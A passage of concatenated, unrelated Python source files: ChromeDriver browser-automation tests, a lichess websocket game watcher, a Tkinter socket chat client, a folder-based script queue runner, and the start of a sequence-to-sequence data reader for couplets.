fileupload_single.send_keys(tmp_file.name)
path = fileupload_single.get_attribute('value')
self.assertTrue(path.endswith(os.path.basename(tmp_file.name)))
def testSetMultipleFilePathsToFileuploadControlWithoutMultipleWillFail(self):
"""Verify setting file paths to the file upload control without 'multiple'
attribute will fail."""
self._driver.get(self.GetTestDataUrl() + '/upload.html')
files = []
filepaths = []
for index in xrange(4):
tmp_file = tempfile.NamedTemporaryFile()
# We need to hold the file objects because the files will be deleted on
# GC.
files.append(tmp_file)
filepath = tmp_file.name
filepaths.append(filepath)
fileupload_single = self._driver.find_element_by_name('fileupload_single')
self.assertFalse(fileupload_single.get_attribute('multiple'))
self.assertRaises(WebDriverException, fileupload_single.send_keys,
'\n'.join(filepaths))
def testSetMultipleFilePathsToFileUploadControl(self):
"""Verify multiple file paths are set to the file upload control."""
self._driver.get(self.GetTestDataUrl() + '/upload.html')
files = []
filepaths = []
filenames = set()
for index in xrange(4):
tmp_file = tempfile.NamedTemporaryFile()
files.append(tmp_file)
filepath = tmp_file.name
filepaths.append(filepath)
filenames.add(os.path.basename(filepath))
fileupload_multi = self._driver.find_element_by_name('fileupload_multi')
multiple = fileupload_multi.get_attribute('multiple')
self.assertEqual('true', multiple)
fileupload_multi.send_keys('\n'.join(filepaths))
files_on_element = self._driver.execute_script(
'return document.getElementById("fileupload_multi").files;')
self.assertTrue(files_on_element)
self.assertEqual(4, len(files_on_element))
for f in files_on_element:
self.assertTrue(f['name'] in filenames)
class FrameSwitchingTest(ChromeDriverTest):
def testGetWindowHandles(self):
driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
driver.get(self.GetTestDataUrl() + '/test_page.html')
driver.execute_script('window.popup = window.open("about:blank")')
self.assertEquals(2, len(driver.window_handles))
driver.execute_script('window.popup.close()')
self.assertEquals(1, len(driver.window_handles))
def testSwitchToSameWindow(self):
driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
driver.get(self.GetTestDataUrl() + '/test_page.html')
driver.switch_to_window(driver.window_handles[0])
self.assertEquals('test_page.html', driver.current_url.split('/')[-1])
def testClosedWindowThrows(self):
driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
driver.get(self.GetTestDataUrl() + '/test_page.html')
driver.execute_script('window.open("about:blank")')
driver.close()
self.assertRaises(WebDriverException, driver.close)
def testSwitchFromClosedWindow(self):
driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
driver.get(self.GetTestDataUrl() + '/test_page.html')
driver.execute_script('window.open("about:blank")')
old_window = driver.current_window_handle
driver.close()
driver.switch_to_window(driver.window_handles[0])
self.assertEquals('about:blank', driver.current_url)
def testSwitchToWindowWhileInSubframe(self):
driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
driver.get(self.GetTestDataUrl() + '/test_page.html')
driver.execute_script('window.open("about:blank")')
driver.switch_to_frame(0)
driver.switch_to_window(driver.window_handles[1])
self.assertEquals('about:blank', driver.current_url)
# Tests that the indexing is absolute and not based on index of frame in its
# parent element.
# See crbug.com/88685.
def testSwitchToFrameByIndex(self):
driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
driver.get(self.GetTestDataUrl() + '/switch_to_frame_by_index.html')
for i in range(3):
driver.switch_to_frame(i)
self.assertEquals(str(i), driver.current_url.split('?')[-1])
driver.switch_to_default_content()
class AlertTest(ChromeDriverTest):
def testAlertOnLoadDoesNotHang(self):
driver = self.GetNewDriver()
self.assertRaises(WebDriverException, driver.get,
self.GetTestDataUrl() + '/alert_on_load.html')
driver.switch_to_alert().accept()
def testAlertWhenTypingThrows(self):
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/alerts.html')
input_box = driver.find_element_by_name('onkeypress')
self.assertRaises(WebDriverException, input_box.send_keys, 'a')
def testAlertJustAfterTypingDoesNotThrow(self):
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/alerts.html')
driver.find_element_by_name('onkeyup').send_keys('a')
driver.switch_to_alert().accept()
def testAlertOnScriptDoesNotHang(self):
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/alerts.html')
self.assertRaises(WebDriverException, driver.execute_script, 'alert("ok")')
# See http://code.google.com/p/selenium/issues/detail?id=2671.
def testCanPerformJSBasedActionsThatCauseAlertsAtTheEnd(self):
driver = self.GetNewDriver()
driver.execute_script(
'var select = document.createElement("select");' +
'select.innerHTML = "<option>1</option><option>2</option>";' +
'select.addEventListener("change", function() { alert("hi"); });' +
'document.body.appendChild(select);')
# Shouldn't throw an exception, even though an alert appears mid-script.
driver.find_elements_by_tag_name('option')[-1].click()
def testMustHandleAlertFirst(self):
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/alerts.html')
input_box = driver.find_element_by_name('normal')
driver.execute_async_script('arguments[0](); window.alert("ok")')
self.assertRaises(WebDriverException, driver.execute_script, 'a = 1')
self.assertRaises(WebDriverException, input_box.send_keys, 'abc')
self.assertRaises(WebDriverException, driver.get,
self.GetTestDataUrl() + '/test_page.html')
self.assertRaises(WebDriverException, driver.refresh)
self.assertRaises(WebDriverException, driver.back)
self.assertRaises(WebDriverException, driver.forward)
self.assertRaises(WebDriverException, driver.get_screenshot_as_base64)
def testCanHandleAlertInSubframe(self):
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/alerts.html')
driver.switch_to_frame('subframe')
driver.execute_async_script('arguments[0](); window.alert("ok")')
driver.switch_to_alert().accept()
class WindowTest(ChromeDriverTest):
"""Tests for WebDriver window commands."""
def setUp(self):
super(WindowTest, self).setUp()
self._driver = self.GetNewDriver()
def testSize(self):
size = self._driver.get_window_size()
self._driver.set_window_size(size['width'], size['height'])
self.assertEquals(size, self._driver.get_window_size())
self._driver.set_window_size(800, 600)
self.assertEquals(800, self._driver.get_window_size()['width'])
self.assertEquals(600, self._driver.get_window_size()['height'])
def testPosition(self):
pos = self._driver.get_window_position()
self._driver.set_window_position(pos['x'], pos['y'])
self.assertEquals(pos, self._driver.get_window_position())
self._driver.set_window_position(100, 200)
self.assertEquals(100, self._driver.get_window_position()['x'])
self.assertEquals(200, self._driver.get_window_position()['y'])
# Systems without window manager (Xvfb, Xvnc) do not implement maximization.
@SkipIf(util.IsLinux())
def testMaximize(self):
old_size = self._driver.get_window_size()
self._driver.maximize_window()
new_size = self._driver.get_window_size()
self.assertTrue(old_size['width'] <= new_size['width'])
self.assertTrue(old_size['height'] <= new_size['height'])
def testWindowHandle(self):
"""Test specifying window handle."""
self._driver.execute_script(
'window.open("about:blank", "name", "height=200, width=200")')
windows = self._driver.window_handles
self.assertEquals(2, len(windows))
self._driver.set_window_size(400, 300, windows[1])
self.assertEquals(400, self._driver.get_window_size(windows[1])['width'])
self.assertEquals(300, self._driver.get_window_size(windows[1])['height'])
self.assertNotEquals(self._driver.get_window_size(windows[1]),
self._driver.get_window_size(windows[0]))
def testInvalidWindowHandle(self):
"""Tests specifying invalid handle."""
invalid_handle = 'f1-120'
self.assertRaises(WebDriverException, self._driver.set_window_size,
400, 300, invalid_handle)
self.assertRaises(NoSuchWindowException, self._driver.get_window_size,
invalid_handle)
self.assertRaises(NoSuchWindowException, self._driver.set_window_position,
1, 1, invalid_handle)
self.assertRaises(NoSuchWindowException, self._driver.get_window_position,
invalid_handle)
class GeolocationTest(ChromeDriverTest):
"""Tests for WebDriver geolocation commands."""
def testGeolocation(self):
"""Tests the get and set geolocation commands."""
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/empty.html')
# TODO(kkania): Update the python bindings and get rid of these.
driver.command_executor._commands.update({
'getLoc': ('GET', '/session/$sessionId/location'),
'setLoc': ('POST', '/session/$sessionId/location')
})
def getLocation():
return driver.execute('getLoc')['value']
def setLocation(location):
driver.execute('setLoc', {'location': location})
expected_location = {'latitude': 50, 'longitude': 50, 'altitude': 300}
setLocation(expected_location)
location = getLocation()
self.assertEquals(expected_location, location)
driver.set_script_timeout(10)
result = driver.execute_async_script("""
var callback = arguments[0];
window.navigator.geolocation.getCurrentPosition(
function success(result) { callback(result.coords); },
function fail(error) { callback(error.message); });""")
self.assertEquals(expected_location['latitude'], result['latitude'])
self.assertEquals(expected_location['longitude'], result['longitude'])
self.assertEquals(expected_location['altitude'], result['altitude'])
class ExtensionTest(ChromeDriverTest):
INFOBAR_BROWSER_ACTION_EXTENSION = test_paths.TEST_DATA_PATH + \
'/infobar_browser_action_extension'
PAGE_ACTION_EXTENSION = test_paths.TEST_DATA_PATH + \
'/page_action_extension'
APP_SHELL = test_paths.TEST_DATA_PATH + \
'/app_shell_extension'
def testExtensionInstallAndUninstall(self):
driver = self.GetNewDriver()
self.assertEquals(0, len(driver.get_installed_extensions()))
ext = driver.install_extension(self.PAGE_ACTION_EXTENSION)
extensions = driver.get_installed_extensions()
self.assertEquals(1, len(extensions))
self.assertEquals(ext.id, extensions[0].id)
ext.uninstall()
self.assertEquals(0, len(driver.get_installed_extensions()))
def testExtensionInfo(self):
driver = self.GetNewDriver()
ext = driver.install_extension(self.PAGE_ACTION_EXTENSION)
self.assertEquals('Page action extension', ext.get_name())
self.assertEquals('1.0', ext.get_version())
self.assertEquals(32, len(ext.id))
self.assertTrue(ext.is_enabled())
ext.set_enabled(True)
ext.set_enabled(False)
self.assertFalse(ext.is_enabled())
ext.set_enabled(True)
self.assertTrue(ext.is_enabled())
def _testExtensionView(self, driver, view_handle, extension):
"""Tests that the given view supports basic WebDriver functionality."""
driver.switch_to_window(view_handle)
self.assertTrue(driver.execute_script('return true'))
checkbox = driver.find_element_by_id('checkbox')
checkbox.click()
self.assertTrue(checkbox.is_selected())
textfield = driver.find_element_by_id('textfield')
textfield.send_keys('test')
self.assertEquals('test', textfield.get_attribute('value'))
self.assertEquals('test', driver.title)
self.assertTrue(driver.current_url.endswith('view_checks.html'))
self.assertTrue('Should be in page source' in driver.page_source)
driver.close()
def is_view_closed(driver):
return len(filter(lambda view: view['handle'] == view_handle,
extension._get_views())) == 0
WebDriverWait(driver, 10).until(is_view_closed)
# Mac extension infobars are currently broken: crbug.com/107573.
@SkipIf(util.IsMac())
def testInfobarView(self):
driver = self.GetNewDriver({'chrome.switches':
['enable-experimental-extension-apis']})
ext = driver.install_extension(self.INFOBAR_BROWSER_ACTION_EXTENSION)
driver.switch_to_window(ext.get_bg_page_handle())
driver.set_script_timeout(10)
driver.execute_async_script('waitForInfobar(arguments[0])')
self._testExtensionView(driver, ext.get_infobar_handles()[0], ext)
def testBrowserActionPopupView(self):
driver = self.GetNewDriver({'chrome.switches':
['enable-experimental-extension-apis']})
ext = driver.install_extension(self.INFOBAR_BROWSER_ACTION_EXTENSION)
ext.click_browser_action()
self._testExtensionView(driver, ext.get_popup_handle(), ext)
def testPageActionPopupView(self):
driver = self.GetNewDriver()
ext = driver.install_extension(self.PAGE_ACTION_EXTENSION)
def is_page_action_visible(driver):
return ext.is_page_action_visible()
WebDriverWait(driver, 10).until(is_page_action_visible)
ext.click_page_action()
self._testExtensionView(driver, ext.get_popup_handle(), ext)
def testAppShellView(self):
driver = self.GetNewDriver({'chrome.switches':
['enable-experimental-extension-apis']})
ext = driver.install_extension(self.APP_SHELL)
# Navigates to the new tab page to launch the app.
driver.get('chrome:newtab')
app = driver.find_element_by_xpath("//div[@title='App Shell']")
app.click()
def is_app_window_launched(driver):
return ext.get_app_shell_handle() is not None
WebDriverWait(driver, 10).until(is_app_window_launched)
self._testExtensionView(driver, ext.get_app_shell_handle(), ext)
class BadJSTest(ChromeDriverTest):
"""Tests that ensure sites with hacky JS don't break ChromeDriver."""
def testFindElementDoesNotUseNativeFuncs(self):
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/bad_native_funcs.html')
# This will throw an exception if any native funcs are used.
driver.find_element_by_tag_name('body').find_elements_by_tag_name('div')
class ContentSettingsTest(ChromeDriverTest):
"""Tests that various types of content are allowed by default."""
def testPopups(self):
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/empty.html')
driver.execute_script('window.open("about:blank")')
self.assertEquals(2, len(driver.window_handles))
# Failing on win7: crbug.com/141231.
@SkipIf(util.IsWin())
def testPopupsCanBeResized(self):
"""Regression test for chromedriver issue 126."""
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/empty.html')
driver.execute_script(
'window.open("empty.html", "popup", "width=500,height=500")')
driver.switch_to_window(driver.window_handles[1])
size = driver.get_window_size()
bigger_size = dict(map(lambda x: (x, size[x] + 100), size))
smaller_size = dict(map(lambda x: (x, size[x] - 100), size))
driver.set_window_size(bigger_size['width'], bigger_size['height'])
self.assertEquals(bigger_size, driver.get_window_size())
driver.set_window_size(smaller_size['width'], smaller_size['height'])
self.assertEquals(smaller_size, driver.get_window_size())
def testGeolocation(self):
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/empty.html')
driver.set_script_timeout(10)
# Will timeout if infobar appears.
driver.execute_async_script(
'navigator.geolocation.getCurrentPosition(arguments[0], arguments[0]);')
def testMediaStream(self):
driver = self.GetNewDriver()
# Allowing camera/mic access by default only works for https sites.
driver.get(self.GetHttpsTestDataUrl() + '/empty.html')
driver.set_script_timeout(10)
# Will timeout if infobar appears.
driver.execute_async_script(
'navigator.webkitGetUserMedia({audio:true, video:true},' +
' arguments[0], arguments[0]);')
|
worker.py
|
import queue
import threading
import websocket
import json
import time
from django.utils import timezone
from datetime import timedelta
def _run_worker():
while True:
_, fn, args = _work_queue.get()
try:
fn(*args)
except:
pass
_work_queue = queue.PriorityQueue()
_worker_thread = threading.Thread(target=_run_worker)
_worker_thread.daemon = True
_worker_thread.start()
def queue_work(priority, fn, *args):
_work_queue.put((-priority, fn, args))
def _run_socket():
global _websocket
last_start = None
fallback = 2
while True:
try:
if last_start is not None and last_start > timezone.now() - timedelta(seconds=10):
time.sleep(fallback)
fallback = fallback * 2
if fallback > 120:
fallback = 120
else:
fallback = 2
last_start = timezone.now()
_websocket = websocket.create_connection('wss://socket.lichess.org/api/socket')
with _games_lock:
for game_id in list(_games.keys()):
_start_watching(game_id)
while True:
msg = json.loads(_websocket.recv())
if msg['t'] == 'fen':
with _games_lock:
game_id = msg['d']['id']
if game_id in _games:
_games[game_id] = msg
except:
continue
def _start_watching(game_id):
try:
_websocket.send(json.dumps({'t': 'startWatching', 'd': game_id}))
except:
pass
_websocket = None
_games = {}
_games_lock = threading.Lock()
_socket_thread = threading.Thread(target=_run_socket)
_socket_thread.daemon = True
_socket_thread.start()
def watch_games(game_ids):
with _games_lock:
game_id_set = set(game_ids)
for game_id in set(_games.keys()) - game_id_set:
del _games[game_id]
for game_id in game_id_set - set(_games.keys()):
_games[game_id] = None
_start_watching(game_id)
return [_games[game_id] for game_id in game_ids]
def add_watch(game_id):
with _games_lock:
if game_id not in _games:
_games[game_id] = None
_start_watching(game_id)
|
client-copy2.py
|
# -*- coding: utf-8 -*-
import socket
from tkinter import *
import time
import threading
global sock,t, txtMsg,txtMsgList,addr,M,chat_client_list
def Clear_History():
txtMsgList.delete('0.0', END)
def sendMsg(sock): # 发送消息
text = txtMsg.get('0.0', END).strip() + "\n"
txtMsg.delete('0.0', END)
sock.send(text.encode('utf-8'))
if text == "endchat\n":
close()
def cancelMsg(): # 取消消息
txtMsg.delete('', END)
def sendMsgEvent(event): # 发送消息事件
if event.keysym == "Return":# 按回车键可发送
sendMsg(sock)
def send_close():
sock.send("endchat\n".encode('utf-8'))
close()
def close():#关闭键有bug向服务器发送退出请求
t.destroy()#guan
def add_chat_client_info():
listLianxi.delete(0,END)
# print(chat_client_list)
for i in range(len(chat_client_list)):
client_NO = f'Client{i}(ONLINE):'
client_If = str(chat_client_list[i])
listLianxi.insert(END, client_NO)
listLianxi.insert(END, client_If)
# <editor-fold desc=“TK块”>
t = Tk()# 创建窗口
t.title('Chat聊天窗口') # 窗口名称
t.resizable(0, 0) # 禁止调整窗口大小
###******创建frame容器******###
frmA1 = Frame(width=180, height=300)
frmB1 = Frame(width=350, height=300)
frmB2 = Frame(width=350, height=80)
frmB3 = Frame(width=350, height=25)
###******创建控件******###
# 1.Text控件
txtMsgList = Text(frmB1,width=45)
txtMsg = Text(frmB2,width=45);
txtMsg.bind("<KeyPress-Return>", sendMsgEvent) # 事件绑定,定义快捷键
btnSend = Button(frmB3, text='发送', width=8, command=lambda: sendMsg(sock))
btnCancel = Button(frmB3, text='取消', width=8, command=cancelMsg)
btnCance2 = Button(frmB3, text="关闭", width=8, command=send_close)
btnCance3 = Button(frmB3, text="清除记录", width=8, command=Clear_History)
scroLianxi = Scrollbar(frmA1, width=22)#聊天群成员
listLianxi = Listbox(frmA1, width=24, height=20,
yscrollcommand=scroLianxi.set) # 连接listbox 到 vertical scrollbar
scroLianxi.config(command=listLianxi.yview) # scrollbar滚动时listbox同时滚动
###******窗口布局******###
frmA1.grid(row=0, column=0)
frmB1.grid(row=0, column=1)
frmB2.grid(row=2, column=1)
frmB3.grid(row=3, column=1)
###******窗口布局******###
frmA1.grid_propagate(0)
frmB1.grid_propagate(0)
frmB2.grid_propagate(0)
frmB3.grid_propagate(0)
###******控件布局******###
btnSend.grid(row=0, column=0)
btnCancel.grid(row=0, column=1)
btnCance2.grid(row=0, column=2)
btnCance3.grid(row=0, column=3)
txtMsgList.grid()
txtMsg.grid()
scroLianxi.grid(row=0, column=1, ipady=120)
listLianxi.grid(row=0, column=0)
# </editor-fold>
def autorobot(sock):
illustrate = sock.recv(1024)
print(illustrate.decode('utf-8'))
while True:
m = input('cloemt:')
sock.send(m.encode('utf-8'))
if m == "end":
print('**结束autorobot模式**')
break
else:
r = sock.recv(1024)
r = r.decode('utf-8')
print('server:', r)
def math(sock):
# 接收说明
illustrate = sock.recv(1024)
print(illustrate.decode('utf-8'))
while True:
m = input('cloemt:')
sock.send(m.encode('utf-8'))
if m == "end":
print('**结束math数学模式**')
break
elif m == "math":
r = sock.recv(1024)
r = r.decode('utf-8')
print('server:', r)
elif m == "a":
# 接受说明
ill = sock.recv(1024)
print(ill.decode('utf-8'))
# ********
m = input('cloemt:')
m = m.encode('utf-8')
sock.send(m)
# ********
result = sock.recv(1024).decode('utf-8')
print("返回结果:", result)
elif m == "b":
# 接受说明
ill = sock.recv(1024)
print(ill.decode('utf-8'))
# ********
m = input('cloemt:')
m = m.encode('utf-8')
sock.send(m)
# ********
result = sock.recv(1024).decode('utf-8')
print("返回结果:", result)
elif m == "c":
# 接受说明
ill = sock.recv(1024)
print(ill.decode('utf-8'))
# ********
r1 = sock.recv(1024).decode('utf-8')
m = input(r1)
sock.send(m.encode('utf-8'))
r2 = sock.recv(1024).decode('utf-8')
m = input(r2)
sock.send(m.encode('utf-8'))
r3 = sock.recv(1024).decode('utf-8')
m = input(r3)
sock.send(m.encode('utf-8'))
# ********
result = sock.recv(1024).decode('utf-8')
print("梯形面积:", result)
elif m == "d":
# 接受说明
ill = sock.recv(1024)
print(ill.decode('utf-8'))
# ********
r1 = sock.recv(1024).decode('utf-8')
m = input(r1)
sock.send(m.encode('utf-8'))
r2 = sock.recv(1024).decode('utf-8')
m = input(r2)
sock.send(m.encode('utf-8'))
# ********
result = sock.recv(1024).decode('utf-8')
print("平行四边形面积:", result)
else:
r = sock.recv(1024)
print(r.decode('utf-8'))
def Http(sock):
illustrate = sock.recv(1024)
print(illustrate.decode('utf-8'))
while True:
m = input("请求方法:")
sock.send(m.encode('utf-8'))
if m == "end":
print('**结束Http模式**')
break # 退出检测
elif m == "hist" or m == "HIST":
print("输出历史记录:")
text = sock.recv(1024).decode('utf-8')
print(text)
continue
else:
m = input("Host:")
sock.send(m.encode('utf-8'))
m = input("Porst:")
if not m:
m = "80"
sock.send(m.encode('utf-8'))
m = input("Url:")
if not m:
m = "/"
sock.send(m.encode('utf-8'))
m = input("Connection:")
if not m:
m = "\r\n"
sock.send(m.encode('utf-8'))
m = input("Content-Type:")
if not m:
m = "text/html"
sock.send(m.encode('utf-8'))
response = sock.recv(1024 * 1024).decode('utf-8')
print("返回数据:\n", response)
def monitor():
while 1:
text = sock.recv(1024)
text = text.decode('utf-8')
# print(text == "breack")
# print(text[7:])
if text == "breack":
break
elif text[:7] == "\\\\addr:":
addr_client = text[7:]
if addr_client not in chat_client_list:
chat_client_list.append(addr_client)
add_chat_client_info()
continue
txtMsgList.insert(END, text)
def Chat(sock):
global M,chat_client_list
illustrate = sock.recv(1024)
print(illustrate.decode('utf-8'))
chat_client_list = []
M = threading.Thread(target=monitor)
M.start()
t.mainloop()
def main(sock):
while True:
mod = sock.recv(1024)
print(mod.decode('utf-8'))
m = input('cliemt:')
sock.send(m.encode('utf-8'))
re = sock.recv(1024)
re = re.decode('utf-8')
print('------------------model-------------->', re)
# *************模式的选取与确认**************
if re == "endserver":
r = sock.recv(1024)
print(r.decode('utf-8'))
sock.close()
break
elif re == "autorobot":
print("进入autorobot模式")
autorobot(sock)
elif re == "math":
print("进入数学模式")
math(sock)
elif re == "Http":
print("进入Http模式")
Http(sock)
elif re == "Chat":
print("进入Chat模式")
Chat(sock)
if __name__ == "__main__":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('172.20.10.13', 9090))#'localhost'
sock.send("Test".encode('utf-8'))
test = sock.recv(1024)
if test.decode('utf-8') == "Test":
print('链接成功')
addr = str(sock.recv(1024).decode('utf-8'))
print(addr)
# ***************链接验证*******************
main(sock)
else:
print(test.decode('utf-8'))
sock.close()
|
core.py
|
__all__ = ['setup_dirs', 'find_next_script', 'check_if_process_running', 'safe_rename', 'ResourcePoolBase', 'ResourcePoolCPU']
import logging
import time
from datetime import datetime
import psutil
logger = logging.getLogger(__name__)
# Cell
import os
import subprocess
from copy import copy
from threading import Thread
from time import sleep
from uuid import uuid4
os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
from fastcore.all import *
# Cell
def setup_dirs(path):
"Create and return the following subdirs of `path`: to_run running complete fail out"
path.mkdir(exist_ok=True)
dirs = L(path / o for o in 'to_run running complete fail out stalled'.split())
for o in dirs: o.mkdir(exist_ok=True)
return dirs
def find_next_script(p):
"""Get the first script from `p` (in sorted order)"""
files = p.ls().sorted().filter(Self.is_file())
if files:
return files[0]
return None
def safe_rename(file, dest):
"""Move `file` to `dest`, prefixing a random uuid if there's a name conflict"""
to_name = dest / file.name
if to_name.exists():
u = uuid4()
date_now = datetime.now().strftime("%c").replace(":", "-").replace(" ", "_")
file_name, file_extension = os.path.splitext(file.name)
to_name = dest / f'{file_name}--{date_now}--{u}{file_extension}'
logger.warning(f'Using unique name {to_name}')
file.replace(to_name)
return to_name
def check_if_process_running(process_name):
"""
Check if there is any running process that contains the given name processName.
"""
# Iterate over the all the running process
for proc in psutil.process_iter():
try:
# Check if process name contains the given name string.
if any([process_name.lower() in p.lower() for p in proc.cmdline()]): # or '/bin/sh' in proc.cmdline()):
logger.debug(f"=== PROCESS FOUND ===")
logger.debug(f"name: {proc.name()}")
logger.debug(f"create_time: {proc.create_time()}")
logger.debug(f"is running: {proc.is_running()}")
logger.debug(f"cmdline: {proc.cmdline()}")
logger.debug(f"status: {proc.status()}")
return proc
except psutil.AccessDenied:
logger.debug("access denied")
except psutil.ZombieProcess:
logger.debug("Zombie process")
except psutil.NoSuchProcess:
logger.debug("No such process")
logger.debug("Process not found returning None")
return None
class ResourcePoolBase():
def __init__(self, path):
self.path = Path(path)
setup_dirs(self.path)
def _lockpath(self, ident):
return self.path / f'{ident}.lock'
def _is_locked(self, ident):
return self._lockpath(ident).exists()
def lock(self, ident, txt='locked'):
self._lockpath(ident).write_text(str(txt))
def unlock(self, ident):
return self._lockpath(ident).unlink() if self._is_locked(ident) else None
def is_available(self, ident):
return not self._is_locked(ident)
def all_ids(self):
raise NotImplementedError
def find_next(self):
return first(o for o in self.all_ids() if self.is_available(o))
def lock_next(self):
ident = self.find_next()
if ident is None:
return
self.lock(ident)
return ident
def _launch(self, script, ident, env):
with (self.path / 'out' / f'{script.name}.stderr').open("w") as stderr:
with (self.path / 'out' / f'{script.name}.stdout').open("w") as stdout:
process = subprocess.Popen(str(script), env=env, stdout=stdout, stderr=stderr)
self.lock(ident, str(process.pid))
return process.wait()
def _run(self, script, ident):
logger.debug(f"running script on processor with ident: {ident}")
failed = False
env = copy(os.environ)
try:
res = self._launch(script, ident, env=env)
except Exception as e:
failed = str(e)
(self.path / 'out' / f'{script.name}.exitcode').write_text(failed if failed else str(res))
dest = self.path / 'fail' if failed or res else self.path / 'complete'
finish_name = safe_rename(script, dest)
self.unlock(ident)
def run(self, *args, **kwargs):
thread = Thread(target=self._run, args=args, kwargs=kwargs)
logger.debug("Starting Thread..")
thread.start()
def find_stale_scripts(self, terminate_timeout):
script = find_next_script(self.path / 'running')
if not script:
logger.debug("No running scripts, exiting stale scripts search")
return
proc = check_if_process_running(script.name)
if proc:
if not proc.is_running():
logger.debug(f"Script {script.name} is no longer running..attempting kill")
proc.kill()
logger.debug("Process Killed for not running")
else:
if terminate_timeout > 0:
run_duration = time.time() - proc.create_time()
if run_duration > terminate_timeout:
logger.warning(f"Process {script.name} has been running for {run_duration} "
f"timeout set at {terminate_timeout}, killing..")
proc.kill()
logger.debug("Process Killed for terminate_timeout")
else:
logger.debug(f"Process {script.name} has been running for {run_duration}"
f" timeout set at {terminate_timeout}, leaving as is..")
return
else:
logger.debug("terminate_timeout not set, skipping check")
return
else:
logger.warning(f"Process {script.name} was not found yet script is in running folder..moving to stalled")
# Anything that filters down to here must be moved to stalled
logger.debug("Attempting to move stalled script to stalled folder")
(self.path / 'out' / f'{script.name}.exitcode').write_text("stalled")
dest = self.path / 'stalled'
try:
finish_name = safe_rename(script, dest)
logger.debug("moved file to stalled")
except Exception as er:
logger.error(f"Error trying to move script to stalled, did it move?: {er}")
# We only allow one processor for now so we know its processor with identity 0
self.unlock(ident=0)
def poll_scripts(self, poll_interval, exit_when_empty, terminate_timeout):
while True:
logger.debug("==================== NEW POLL ============================")
logger.debug(f"Sleeping for {poll_interval}")
sleep(poll_interval)
logger.debug("Searching for stale scripts")
self.find_stale_scripts(terminate_timeout)
script = find_next_script(self.path / 'to_run')
if script is None:
logger.debug("No scripts found in to_run folder")
if exit_when_empty:
logger.debug("No more scripts to run, exit_when_empty set to True, exiting..")
break
else:
continue
logger.debug(f"Script found in to_run folder {script}")
ident = self.lock_next()
if ident is None:
# First check if the lock is not being used
script = find_next_script(self.path / 'running')
if not script:
logger.debug("There is a lock but no scripts in running folder, unlocking..")
self.unlock(ident=0)
continue
else:
logger.debug(f"could not find available processor to process {script}")
continue
run_name = safe_rename(script, self.path / 'running')
self.run(run_name, ident)
add_docs(ResourcePoolBase, "Base class for locked access to list of idents",
unlock="Remove lockfile for `ident`",
lock="Create lockfile for `ident`",
is_available="Is `ident` available",
all_ids="All idents (abstract method)",
find_next="Finds next available resource, or None",
lock_next="Locks an available resource and returns its ident, or None",
run="Run `script` using resource `ident`",
poll_scripts="Poll `to_run` for scripts and run in parallel on available resources",
find_stale_scripts="Move out stale scripts")
# class FixedWorkerPool(ResourcePoolBase):
# "Vends locked access to fixed list of idents"
#
# def __init__(self, worker_ids, path):
# super().__init__(path)
# self.worker_ids = worker_ids
#
# def all_ids(self):
# "All available idents"
# return self.worker_ids
# Cell
class ResourcePoolCPU(ResourcePoolBase):
"Vends locked access to NVIDIA GPUs"
def __init__(self, path):
# assume a 1 core processor, these are fake id's to be implemented properly
self.ids = [0]
super().__init__(path)
def _launch(self, script, ident, env):
return super()._launch(script, ident, env)
# def is_available(self, ident):
# """
# Right now the CPU is always available, in next iteration we check if the CPU is overloaded or not
# :param ident:
# :return:
# """
# return True
def all_ids(self):
"""All CPUs"""
return self.ids
|
reader.py
|
from queue import Queue
import random
def padding_seq(seq):
results = []
max_len = 0
for s in seq:
if max_len < len(s):
max_len = len(s)
for i in range(0, len(seq)):
l = max_len - len(seq[i])
results.append(seq[i] + [0 for j in range(l)])
return results
def encode_text(words, vocab_indices):
return [vocab_indices[word] for word in words if word in vocab_indices]
def decode_text(labels, vocabs, end_token='</s>'):
results = []
for idx in labels:
word = vocabs[idx]
if word == end_token:
return ' '.join(results)
results.append(word)
return ' '.join(results)
# 读取词表文件
def read_vocab(vocab_file):
f = open(vocab_file, 'rb')
vocabs = [line.decode('utf8')[:-1] for line in f]
f.close()
return vocabs
class SeqReader():
# 配置参数并初始化文件读取
def __init__(self, input_file, target_file, vocab_file, batch_size,
queue_size=2048, worker_size=2, end_token='</s>',
padding=True, max_len=50):
self.input_file = input_file # 训练集输入
self.target_file = target_file # 训练集输出
self.end_token = end_token # 文件结束标志
self.batch_size = batch_size # 每次数据集大小
self.padding = padding # 填充
self.max_len = max_len # 最大长度
# self.vocabs = read_vocab(vocab_file) + [end_token]
self.vocabs = read_vocab(vocab_file) # 读取词表文件存到变量vocabs列表中
self.vocab_indices = dict((c, i) for i, c in enumerate(self.vocabs)) # 枚举及标号vocabs存入字典中
self.data_queue = Queue(queue_size) # 数据队列
self.worker_size = worker_size
with open(self.input_file, 'rb') as f:
for i, l in enumerate(f):
pass
f.close()
self.single_lines = i + 1
self.data_size = int(self.single_lines / batch_size)
self.data_pos = 0
self._init_reader()
def start(self):
return
'''
for i in range(self.worker_size):
t = Thread(target=self._init_reader())
t.daemon = True
t.start()
'''
# 读取一条对联
def read_single_data(self):
if self.data_pos >= len(self.data):
random.shuffle(self.data)
self.data_pos = 0
result = self.data[self.data_pos]
self.data_pos += 1
return result
# 读取n条对联
def read(self):
while True:
batch = {'in_seq': [],
'in_seq_len': [],
'target_seq': [],
'target_seq_len': []}
for i in range(0, self.batch_size): # 添加n对对联数据
item = self.read_single_data() # 获取一条对联
batch['in_seq'].append(item['in_seq'])
batch['in_seq_len'].append(item['in_seq_len'])
batch['target_seq'].append(item['target_seq'])
